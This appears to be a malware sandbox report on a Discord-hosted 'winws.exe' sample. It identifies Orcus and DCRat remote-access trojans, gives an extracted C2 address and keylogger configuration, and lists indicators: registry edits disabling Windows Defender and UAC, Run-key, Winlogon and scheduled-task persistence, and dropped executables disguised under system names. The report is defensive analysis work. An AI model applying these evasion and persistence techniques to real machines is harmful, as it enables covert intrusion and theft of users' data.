Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
113s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/10/2024, 23:14
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral5
Sample
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Resource
win11-20241007-en
General
-
Target
https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
Malware Config
Extracted
orcus
Roblox
89.23.100.155:1337
52641f3c61234743ba12f855fdae3135
-
autostart_method
Registry
-
enable_keylogger
true
-
install_path
%AppData%\Windows\Helper\WinHelper32.exe
-
reconnect_delay
10000
-
registry_keyname
WinHelper32.exe
-
taskscheduler_taskname
WinHelper32
-
watchdog_path
AppData\WinHelperWatchdog.exe
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/5928-334-0x0000000005D00000-0x0000000005D0A000-memory.dmp disable_win_def -
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\", \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\DiagTrack\\Scenarios\\dllhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\", \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\DiagTrack\\Scenarios\\dllhost.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\", \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\", \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\", \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\"" RunShell.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" WinHelper32.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" xdwd.exe -
Orcus family
-
Orcus main payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023c8c-268.dat family_orcus -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5880 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5788 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5136 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3944 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 772 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5560 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5324 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5428 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5544 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5600 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6068 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6020 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5804 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5208 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5416 1600 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5512 1600 schtasks.exe 106 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" WinHelper32.exe -
DCRat payload 1 IoCs
resource yara_rule behavioral1/memory/5204-443-0x000000001B750000-0x000000001B822000-memory.dmp family_dcrat_v2 -
Orcurs Rat Executable 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023c8c-268.dat orcus behavioral1/memory/5928-301-0x00000000008D0000-0x0000000000BD2000-memory.dmp orcus -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6092 powershell.exe 1332 powershell.exe 5500 powershell.exe 5648 powershell.exe 3588 powershell.exe 5256 powershell.exe 5840 powershell.exe 5244 powershell.exe 5236 powershell.exe 5992 powershell.exe 5984 powershell.exe 6136 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WinHelper32.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WinHelper32.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation xdwd.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation RunShell.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation hypercommonSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WinHelperWatchdog.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Boostrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Boostrapper.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WinHelper32.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinHelper32.exe javaw.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinHelper32.exe javaw.exe -
Executes dropped EXE 20 IoCs
pid Process 4776 winws.exe 5796 winws.exe 5268 WinHelper32.exe 5928 xdwd.exe 460 Boostrapper.exe 4756 WindowsInput.exe 6000 WindowsInput.exe 5204 RunShell.exe 4776 WinHelper32.exe 5512 WinHelper32.exe 1456 hypercommonSvc.exe 1660 WinHelperWatchdog.exe 460 WinHelperWatchdog.exe 3900 RuntimeBroker.exe 3312 wininit.exe 6128 WinHelper32.exe 5540 xdwd.exe 5868 Boostrapper.exe 404 RunShell.exe 5212 hypercommonSvc.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" WinHelper32.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features xdwd.exe -
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\ModemLogs\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xdwd = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\DiagTrack\\Scenarios\\dllhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\DiagTrack\\Scenarios\\dllhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xdwd = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\xdwd.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" RunShell.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" WinHelper32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" xdwd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WinHelper32.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 2 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" WinHelper32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 44 raw.githubusercontent.com 46 raw.githubusercontent.com 52 raw.githubusercontent.com 55 raw.githubusercontent.com -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File created \??\c:\Windows\System32\CSCED94E796E85444428CB0B85CDF9B85C9.TMP csc.exe File created \??\c:\Windows\System32\8zj1cq.exe csc.exe File created C:\Windows\SysWOW64\WindowsInput.exe xdwd.exe File created C:\Windows\SysWOW64\WindowsInput.exe.config xdwd.exe -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files (x86)\MSBuild\RuntimeBroker.exe RunShell.exe File created C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe RunShell.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\explorer.exe hypercommonSvc.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\explorer.exe hypercommonSvc.exe File created C:\Program Files\Windows Photo Viewer\fr-FR\9e8d7a4ca61bd9 hypercommonSvc.exe File created C:\Program Files (x86)\MSBuild\9e8d7a4ca61bd9 RunShell.exe File created C:\Program Files\Microsoft Office\PackageManifests\130db365cfcaa0 RunShell.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\7a0fd90576e088 hypercommonSvc.exe File created C:\Program Files\Windows Photo Viewer\fr-FR\RuntimeBroker.exe hypercommonSvc.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\ModemLogs\RuntimeBroker.exe RunShell.exe File created C:\Windows\ModemLogs\9e8d7a4ca61bd9 RunShell.exe File created C:\Windows\DiagTrack\Scenarios\dllhost.exe RunShell.exe File opened for modification C:\Windows\DiagTrack\Scenarios\dllhost.exe RunShell.exe File created C:\Windows\DiagTrack\Scenarios\5940a34987c991 RunShell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelper32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelperWatchdog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Boostrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelper32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdwd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdwd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelper32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelperWatchdog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinHelper32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Boostrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 404 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings WinHelper32.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings Boostrapper.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings RunShell.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings hypercommonSvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings WinHelper32.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings Boostrapper.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings taskmgr.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 290889.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 404 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5136 schtasks.exe 3944 schtasks.exe 5560 schtasks.exe 5428 schtasks.exe 6020 schtasks.exe 6004 schtasks.exe 772 schtasks.exe 5324 schtasks.exe 5208 schtasks.exe 5544 schtasks.exe 5600 schtasks.exe 6068 schtasks.exe 1700 schtasks.exe 5512 schtasks.exe 5880 schtasks.exe 5788 schtasks.exe 5804 schtasks.exe 5416 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3252 msedge.exe 3252 msedge.exe 4656 msedge.exe 4656 msedge.exe 4860 identity_helper.exe 4860 identity_helper.exe 5032 msedge.exe 5032 msedge.exe 5236 powershell.exe 5236 powershell.exe 5236 powershell.exe 5244 powershell.exe 5244 powershell.exe 5244 powershell.exe 5984 powershell.exe 5984 powershell.exe 5992 powershell.exe 5992 powershell.exe 5984 powershell.exe 5992 powershell.exe 6092 powershell.exe 6092 powershell.exe 6136 powershell.exe 6136 powershell.exe 6092 powershell.exe 6136 powershell.exe 5928 xdwd.exe 5928 xdwd.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe 5204 RunShell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4776 WinHelper32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 5236 powershell.exe Token: SeDebugPrivilege 5244 powershell.exe Token: SeDebugPrivilege 5984 powershell.exe Token: SeDebugPrivilege 5992 powershell.exe Token: SeDebugPrivilege 6092 powershell.exe Token: SeDebugPrivilege 6136 powershell.exe Token: SeDebugPrivilege 5928 xdwd.exe Token: SeDebugPrivilege 5204 RunShell.exe Token: SeDebugPrivilege 5248 powershell.exe Token: SeDebugPrivilege 5648 powershell.exe Token: SeDebugPrivilege 5256 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 5840 powershell.exe Token: SeDebugPrivilege 5500 powershell.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 4776 WinHelper32.exe Token: SeDebugPrivilege 5348 taskmgr.exe Token: SeSystemProfilePrivilege 5348 taskmgr.exe Token: SeCreateGlobalPrivilege 5348 taskmgr.exe Token: SeDebugPrivilege 1456 hypercommonSvc.exe Token: SeDebugPrivilege 5720 powershell.exe Token: SeDebugPrivilege 1660 WinHelperWatchdog.exe Token: SeDebugPrivilege 460 WinHelperWatchdog.exe Token: SeDebugPrivilege 3900 RuntimeBroker.exe Token: SeDebugPrivilege 3312 wininit.exe Token: SeDebugPrivilege 404 RunShell.exe Token: SeDebugPrivilege 5212 hypercommonSvc.exe Token: 33 5348 taskmgr.exe Token: SeIncBasePriorityPrivilege 5348 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
